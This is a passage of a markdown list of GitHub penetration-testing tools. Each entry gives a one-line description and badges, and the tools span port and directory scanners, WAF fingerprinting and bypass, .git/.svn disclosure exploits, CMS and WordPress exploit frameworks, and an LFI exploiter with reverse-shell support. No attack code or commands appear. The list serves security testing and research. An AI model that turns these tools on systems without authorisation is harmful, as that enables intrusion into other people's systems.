> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ztgrace/changeme?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ztgrace/changeme?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ztgrace/changeme?style=flat-square) ![GitHub](https://img.shields.io/github/license/ztgrace/changeme?style=flat-square)
- https://github.com/medbenali/CyberScan - **An open source penetration testing tool that can analyse packets,decoding,scanning ports, pinging and geolocation of an IP**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/medbenali/CyberScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/medbenali/CyberScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/medbenali/CyberScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/medbenali/CyberScan?style=flat-square)
- https://github.com/m0nad/HellRaiser - **HellRaiser scan with nmap then correlates cpe's found with cve-search to enumerate vulnerabilities**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m0nad/HellRaiser?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m0nad/HellRaiser?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m0nad/HellRaiser?style=flat-square) ![GitHub](https://img.shields.io/github/license/m0nad/HellRaiser?style=flat-square)
- https://github.com/scipag/vulscan - **Advanced vulnerability scanning with Nmap NSE**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-NSE-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/scipag/vulscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/scipag/vulscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/scipag/vulscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/scipag/vulscan?style=flat-square)
- https://github.com/jekyc/wig - **WebApp information gatherer**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jekyc/wig?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jekyc/wig?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jekyc/wig?style=flat-square) ![GitHub](https://img.shields.io/github/license/jekyc/wig?style=flat-square)
- https://github.com/eldraco/domain_analyzer - **Analyze the security of any domain by finding all the information possible**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/eldraco/domain_analyzer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/eldraco/domain_analyzer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/eldraco/domain_analyzer?style=flat-square) ![GitHub](https://img.shields.io/github/license/eldraco/domain_analyzer?style=flat-square)
- https://github.com/cloudtracer/paskto - **Passive directory scanner and web crawler based on Nikto DB**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cloudtracer/paskto?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cloudtracer/paskto?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cloudtracer/paskto?style=flat-square) ![GitHub](https://img.shields.io/github/license/cloudtracer/paskto?style=flat-square)
- https://github.com/zerokeeper/WebEye - **A web service and WAF fingerprinter**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zerokeeper/WebEye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zerokeeper/WebEye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zerokeeper/WebEye?style=flat-square) ![GitHub](https://img.shields.io/github/license/zerokeeper/WebEye?style=flat-square)
- https://github.com/m3liot/shcheck - **Just check security headers on a target website**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m3liot/shcheck?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m3liot/shcheck?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m3liot/shcheck?style=flat-square) ![GitHub](https://img.shields.io/github/license/m3liot/shcheck?style=flat-square)
- https://github.com/aipengjie/sensitivefilescan - **A speed and awesome sensitive files scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/aipengjie/sensitivefilescan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/aipengjie/sensitivefilescan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/aipengjie/sensitivefilescan?style=flat-square) ![GitHub](https://img.shields.io/github/license/aipengjie/sensitivefilescan?style=flat-square)
- https://github.com/fnk0c/cangibrina - **A fast and powerfull dashboard (admin) finder**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fnk0c/cangibrina?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/aipengjie/sensitivefilescan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fnk0c/cangibrina?style=flat-square) ![GitHub](https://img.shields.io/github/license/fnk0c/cangibrina?style=flat-square)
- https://github.com/n4xh4ck5/CMSsc4n - **Tool to identify if a domain is a CMS such as Wordpress, Moodle, Joomla**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/n4xh4ck5/CMSsc4n?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/n4xh4ck5/CMSsc4n?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/n4xh4ck5/CMSsc4n?style=flat-square) ![GitHub](https://img.shields.io/github/license/n4xh4ck5/CMSsc4n?style=flat-square)
- https://github.com/Ekultek/WhatWaf - **Detect and bypass web application firewalls and protection systems**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ekultek/WhatWaf?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ekultek/WhatWaf?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ekultek/WhatWaf?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ekultek/WhatWaf?style=flat-square)
- https://github.com/dzonerzy/goWAPT - **Go web application penetration test and web application fuzz tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dzonerzy/goWAPT?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dzonerzy/goWAPT?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dzonerzy/goWAPT?style=flat-square) ![GitHub](https://img.shields.io/github/license/dzonerzy/goWAPT?style=flat-square)
- https://github.com/blackye/webdirdig - **Sensitive files scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/webdirdig?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/webdirdig?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/webdirdig?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/webdirdig?style=flat-square)
- https://github.com/boy-hack/w8fuckcdn - **Get the website real IP address by scanning the entire net**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/w8fuckcdn?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/w8fuckcdn?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/w8fuckcdn?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/w8fuckcdn?style=flat-square)
- https://github.com/boy-hack/w11scan - **Distributed web fingerprint identification platform**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/w11scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/w11scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/w11scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/w11scan?style=flat-square)
- https://github.com/Nekmo/dirhunt - **Find web directories without bruteforce**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Nekmo/dirhunt?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Nekmo/dirhunt?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Nekmo/dirhunt?style=flat-square) ![GitHub](https://img.shields.io/github/license/Nekmo/dirhunt?style=flat-square)
- https://github.com/H4ckForJob/dirmap - **An advanced web directory scanning tool that will be more powerful than DirBuster, Dirsearch, cansina, and Yu Jian**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/H4ckForJob/dirmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/H4ckForJob/dirmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/H4ckForJob/dirmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/H4ckForJob/dirmap?style=flat-square)
- https://github.com/s0md3v/Photon - **Incredibly fast crawler which extracts urls, emails, files, website accounts and much more**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Photon?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Photon?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Photon?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Photon?style=flat-square)
- https://github.com/1N3/BlackWidow - **Gather OSINT and fuzz for OWASP vulnerabilities on a target website**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/BlackWidow?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/BlackWidow?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/BlackWidow?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/BlackWidow?style=flat-square)
- https://github.com/saeeddhqan/Maryam - **OSINT and Web-based Footprinting modular framework based on the Recon-ng**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/saeeddhqan/Maryam?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/saeeddhqan/Maryam?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/saeeddhqan/Maryam?style=flat-square) ![GitHub](https://img.shields.io/github/license/saeeddhqan/Maryam?style=flat-square)
- https://github.com/lcatro/network_backdoor_scanner - **An internal network scanner like meterpreter**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-C++-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lcatro/network_backdoor_scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lcatro/network_backdoor_scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lcatro/network_backdoor_scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/lcatro/network_backdoor_scanner?style=flat-square)
- https://github.com/Tib3rius/AutoRecon - **A multi-threaded network reconnaissance tool which performs automated enumeration of services**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tib3rius/AutoRecon?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tib3rius/AutoRecon?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tib3rius/AutoRecon?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tib3rius/AutoRecon?style=flat-square)
- https://github.com/sowish/LNScan - **Local Network Scanner based on BBScan via.lijiejie**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/sowish/LNScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/sowish/LNScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/sowish/LNScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/sowish/LNScan?style=flat-square)
- https://github.com/shadow1ng/fscan - **Intranet integrated scanning tool,build for automatic, full coverage scanning**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shadow1ng/fscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shadow1ng/fscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shadow1ng/fscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/shadow1ng/fscan?style=flat-square)
- https://github.com/b1gcat/DarkEye - **Ports scan and host-alived detect**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/b1gcat/DarkEye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/b1gcat/DarkEye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/b1gcat/DarkEye?style=flat-square) ![GitHub](https://img.shields.io/github/license/b1gcat/DarkEye?style=flat-square)
- https://github.com/v-byte-cpu/sx - **A network scanner that 30x times faster than nmap**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/v-byte-cpu/sx?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/v-byte-cpu/sx?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/v-byte-cpu/sx?style=flat-square) ![GitHub](https://img.shields.io/github/license/v-byte-cpu/sx?style=flat-square)
- https://github.com/nullt3r/jfscan - **Super fast port scanning & service discovery using Masscan and Nmap**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nullt3r/jfscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nullt3r/jfscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nullt3r/jfscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/nullt3r/jfscan?style=flat-square)
- https://github.com/lcvvvv/kscan - **Port scanning, protocol detection(1200+), fingerprint(1w+) and brute force cracking**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lcvvvv/kscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lcvvvv/kscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lcvvvv/kscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/lcvvvv/kscan?style=flat-square)
- https://github.com/OJ/gobuster - **Directory/File, DNS and VHost busting tool written in Go**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OJ/gobuster?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OJ/gobuster?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OJ/gobuster?style=flat-square) ![GitHub](https://img.shields.io/github/license/OJ/gobuster?style=flat-square)
### Special Targets Scan
- https://github.com/1N3/XSSTracer - **A small python script to check for cross-Site tracing, Clickjacking etc**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/XSSTracer?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/XSSTracer?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/XSSTracer?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/XSSTracer?style=flat-square)
- https://github.com/0xHJK/dumpall - **`.git` / `.svn` / `.DS_Store` disclosure exploit**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xHJK/dumpall?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xHJK/dumpall?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xHJK/dumpall?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xHJK/dumpall?style=flat-square)
- https://github.com/shengqi158/svnhack - **A `.svn` folder disclosure exploit**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-NSE-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shengqi158/svnhack?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shengqi158/svnhack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shengqi158/svnhack?style=flat-square) ![GitHub](https://img.shields.io/github/license/shengqi158/svnhack?style=flat-square)
- https://github.com/lijiejie/GitHack - **A `.git` folder disclosure exploit**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/GitHack?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/GitHack?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/GitHack?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/GitHack?style=flat-square)
- https://github.com/blackye/Jenkins - **Jenkins vulnerability detection, user grab enumerating**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/blackye/Jenkins?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/blackye/Jenkins?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/blackye/Jenkins?style=flat-square) ![GitHub](https://img.shields.io/github/license/blackye/Jenkins?style=flat-square)
- https://github.com/code-scan/dzscan - **discuz scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/code-scan/dzscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/code-scan/dzscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/code-scan/dzscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/code-scan/dzscan?style=flat-square)
- https://github.com/chuhades/CMS-Exploit-Framework -**CMS exploit framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chuhades/CMS-Exploit-Framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chuhades/CMS-Exploit-Framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chuhades/CMS-Exploit-Framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/chuhades/CMS-Exploit-Framework?style=flat-square)
- https://github.com/lijiejie/IIS_shortname_Scanner - **An IIS shortname scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/IIS_shortname_Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/IIS_shortname_Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/IIS_shortname_Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/IIS_shortname_Scanner?style=flat-square)
- https://github.com/riusksk/FlashScanner - **Flash XSS scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/riusksk/FlashScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/riusksk/FlashScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/riusksk/FlashScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/riusksk/FlashScanner?style=flat-square)
- https://github.com/epinna/tplmap - **Automatic Server-Side Template Injection detection and exploitation tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/epinna/tplmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/epinna/tplmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/epinna/tplmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/epinna/tplmap?style=flat-square)
- https://github.com/rastating/wordpress-exploit-framework - **Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rastating/wordpress-exploit-framework?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rastating/wordpress-exploit-framework?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rastating/wordpress-exploit-framework?style=flat-square) ![GitHub](https://img.shields.io/github/license/rastating/wordpress-exploit-framework?style=flat-square)
- https://github.com/ilmila/J2EEScan - **A plugin for Burp Suite proxy to improve the test coverage during web application penetration tests on J2EE applications**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ilmila/J2EEScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ilmila/J2EEScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ilmila/J2EEScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ilmila/J2EEScan?style=flat-square)
- https://github.com/riusksk/StrutScan - **Struts2 vuls scanner base Perl script**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/riusksk/StrutScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/riusksk/StrutScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/riusksk/StrutScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/riusksk/StrutScan?style=flat-square)
- https://github.com/D35m0nd142/LFISuite - **Totally automatic LFI exploiterand scanner supports reverse shell**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/D35m0nd142/LFISuite?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/D35m0nd142/LFISuite?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/D35m0nd142/LFISuite?style=flat-square) ![GitHub](https://img.shields.io/github/license/D35m0nd142/LFISuite?style=flat-square)
- https://github.com/0x4D31/salt-scanner - **Linux vulnerability scanner based on Salt Open and vulners audit API, with Slack notifications and JIRA integration**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0x4D31/salt-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0x4D31/salt-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0x4D31/salt-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/0x4D31/salt-scanner?style=flat-square)
- https://github.com/tijme/angularjs-csti-scanner - **Automated client-side template injection detection for AngularJS**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/tijme/angularjs-csti-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/tijme/angularjs-csti-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/tijme/angularjs-csti-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/tijme/angularjs-csti-scanner?style=flat-square)
- https://github.com/irsdl/IIS-ShortName-Scanner - **Scanners for IIS short filename 8.3 disclosure vulnerability**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/irsdl/IIS-ShortName-Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/irsdl/IIS-ShortName-Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/irsdl/IIS-ShortName-Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/irsdl/IIS-ShortName-Scanner?style=flat-square)
- https://github.com/swisskyrepo/Wordpresscan - **WPScan rewritten in Python + some WPSeku ideas**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/swisskyrepo/Wordpresscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/swisskyrepo/Wordpresscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/swisskyrepo/Wordpresscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/swisskyrepo/Wordpresscan?style=flat-square)
